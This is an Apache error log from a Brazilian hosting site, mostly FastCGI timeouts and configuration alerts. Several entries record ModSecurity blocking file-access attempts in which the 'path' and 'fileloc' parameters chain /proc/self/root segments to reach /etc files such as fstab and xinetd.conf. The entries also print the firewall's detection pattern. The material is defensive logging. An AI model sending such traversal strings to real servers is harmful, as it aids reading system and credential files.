[Fri Mar 20 02:13:52.408070 2026] [:error] [pid 21563:tid 140411674785536] [client 74.7.241.31:57636] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzXkEpm7ZmxKZTM4baAyAAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Fri Mar 20 02:14:07.113833 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35368] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:14:29.219232 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:42736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzXtda6ubjKNq_cu4aQSQAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 02:14:34.117935 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36076] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:14:57.071494 2026] [:error] [pid 21563:tid 140411632822016] [client 74.7.243.128:38224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzX0Upm7ZmxKZTM4baA9QAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 02:15:02.222080 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36758] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:15:30.128248 2026] [proxy_fcgi:error] [pid 5816:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37470] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:15:55.053897 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38238] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:16:19.137791 2026] [proxy_fcgi:error] [pid 21219:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38956] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:16:42.128818 2026] [proxy_fcgi:error] [pid 5816:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39566] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:17:06.120626 2026] [proxy_fcgi:error] [pid 21219:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40318] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:17:29.097823 2026] [proxy_fcgi:error] [pid 8307:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41014] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:17:51.137812 2026] [proxy_fcgi:error] [pid 21563:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41638] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:18:14.173134 2026] [proxy_fcgi:error] [pid 7235:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42224] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:18:35.685912 2026] [mime_magic:error] [pid 5816:tid 140411641214720] (70014)End of file found: [client 57.141.18.41:45536] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:18:36.137178 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42684] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:19:00.141788 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43332] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:19:24.125830 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43910] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:19:52.133804 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44556] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:20:20.126288 2026] [proxy_fcgi:error] [pid 7893:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45232] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:20:54.137889 2026] [proxy_fcgi:error] [pid 21219:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46276] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:20:56.606609 2026] [mime_magic:error] [pid 7893:tid 140411716749056] (70014)End of file found: [client 57.141.18.32:49474] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:21:22.145812 2026] [proxy_fcgi:error] [pid 28244:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:46964] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:21:48.093820 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:47584] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:22:12.065874 2026] [proxy_fcgi:error] [pid 28244:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48178] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:22:35.129783 2026] [proxy_fcgi:error] [pid 30424:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48764] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:22:57.165816 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49304] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:23:02.995595 2026] [mime_magic:error] [pid 15826:tid 140411565680384] (70014)End of file found: [client 74.7.241.31:48374] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/lib/yum/yumdb
[Fri Mar 20 02:23:21.693822 2026] [proxy_fcgi:error] [pid 5816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50032] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:23:27.568164 2026] [mime_magic:error] [pid 15826:tid 140411548894976] (70014)End of file found: [client 57.141.18.106:53900] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:23:41.094059 2026] [mime_magic:error] [pid 21219:tid 140411708356352] (70014)End of file found: [client 57.141.18.30:54158] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:23:45.125765 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50674] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:24:00.997806 2026] [core:alert] [pid 30077:tid 140411624429312] [client 57.141.18.13:54820] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:24:09.073899 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:51356] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:24:33.473799 2026] [proxy_fcgi:error] [pid 7235:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52062] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:24:57.129836 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52806] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:25:27.881786 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53632] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:25:53.129792 2026] [proxy_fcgi:error] [pid 8307:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54396] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:26:15.129800 2026] [proxy_fcgi:error] [pid 5816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54952] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:26:41.132064 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55602] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:27:10.125806 2026] [proxy_fcgi:error] [pid 5816:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56290] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:27:38.138753 2026] [proxy_fcgi:error] [pid 28562:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57178] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:28:00.121879 2026] [proxy_fcgi:error] [pid 28562:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:57858] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:28:22.481839 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:58594] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:28:46.057914 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59254] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:29:10.123179 2026] [proxy_fcgi:error] [pid 5816:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59932] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:29:33.131338 2026] [proxy_fcgi:error] [pid 21219:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60620] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:29:59.137842 2026] [proxy_fcgi:error] [pid 31215:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33266] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:30:21.133776 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34082] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:30:43.141791 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34966] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:31:05.157885 2026] [proxy_fcgi:error] [pid 7893:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35714] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:31:28.137817 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36372] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:31:52.121816 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37042] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:32:16.133842 2026] [proxy_fcgi:error] [pid 8307:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37698] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:32:41.025844 2026] [proxy_fcgi:error] [pid 7893:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38356] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:33:08.101904 2026] [proxy_fcgi:error] [pid 28838:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:39078] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:33:34.133920 2026] [proxy_fcgi:error] [pid 21219:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39792] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:33:58.154031 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40454] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:34:21.129877 2026] [proxy_fcgi:error] [pid 7893:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41066] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:34:44.134073 2026] [proxy_fcgi:error] [pid 8307:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41610] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:35:07.793982 2026] [proxy_fcgi:error] [pid 7235:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42114] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:35:34.146973 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42780] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:35:59.141815 2026] [proxy_fcgi:error] [pid 21219:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43444] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:36:21.161806 2026] [proxy_fcgi:error] [pid 8307:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:43950] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:36:44.257934 2026] [proxy_fcgi:error] [pid 8307:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44408] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:37:08.133813 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:44996] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:37:29.758029 2026] [mime_magic:error] [pid 15826:tid 140411607643904] (70014)End of file found: [client 57.141.18.68:48816] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:37:31.137858 2026] [proxy_fcgi:error] [pid 30424:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:45558] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:37:51.126861 2026] [mime_magic:error] [pid 7235:tid 140411741927168] (70014)End of file found: [client 57.141.18.10:49440] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:37:54.145782 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46114] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:38:17.128405 2026] [proxy_fcgi:error] [pid 7235:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46704] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:38:41.070081 2026] [proxy_fcgi:error] [pid 31215:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47338] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:38:49.599693 2026] [mime_magic:error] [pid 7235:tid 140411590858496] (70014)End of file found: [client 57.141.18.94:51148] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:39:04.391274 2026] [mime_magic:error] [pid 7893:tid 140411574073088] (70014)End of file found: [client 57.141.18.118:51584] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:39:06.045789 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48108] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:39:31.165818 2026] [proxy_fcgi:error] [pid 7893:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48808] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:39:55.909844 2026] [proxy_fcgi:error] [pid 8307:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49444] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:40:17.529763 2026] [mime_magic:error] [pid 30424:tid 140411548894976] (70014)End of file found: [client 57.141.18.20:53678] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:40:19.137777 2026] [proxy_fcgi:error] [pid 21219:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50066] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:40:50.153767 2026] [proxy_fcgi:error] [pid 30424:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:50756] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:40:54.923568 2026] [mime_magic:error] [pid 21219:tid 140411548894976] (70014)End of file found: [client 57.141.18.117:54756] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 02:41:26.097851 2026] [proxy_fcgi:error] [pid 7235:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51716] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:41:52.786238 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:35706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeIAF0L0L-SsrnPo4uDwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:41:58.122022 2026] [proxy_fcgi:error] [pid 21219:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52708] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:42:01.527382 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.241.31:46086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeKfXLqtnMIWvjpaJdRQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:42:11.871058 2026] [:error] [pid 31215:tid 140411607643904] [client 74.7.243.128:48942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeMwF0L0L-SsrnPo4uIgAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:42:19.678691 2026] [:error] [pid 30424:tid 140411658000128] [client 74.7.241.31:59066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeO8t36Dv4L1GW-s-eNgAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:42:22.085837 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53482] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 02:42:27.920489 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:43212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeQwkwaGbbGflqUZAKegAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 02:42:37.059470 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:42832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzeTda6ubjKNq_cu4aUBAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 02:42:41.030443 2026] [core:alert] [pid 7235:tid 140411741927168] [client 57.141.18.116:57306] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:42:41.033829 2026] [core:alert] [pid 31215:tid 140411708356352] [client 57.141.18.75:57272] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:42:41.034281 2026] [core:alert] [pid 7235:tid 140411641214720] [client 57.141.18.48:57248] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:42:41.034485 2026] [core:alert] [pid 7893:tid 140411708356352] [client 57.141.18.6:56442] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 02:42:41.034675 2026] [core:alert] [pid 30424:tid 140411683178240] [client 57.141.18.123:57296] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
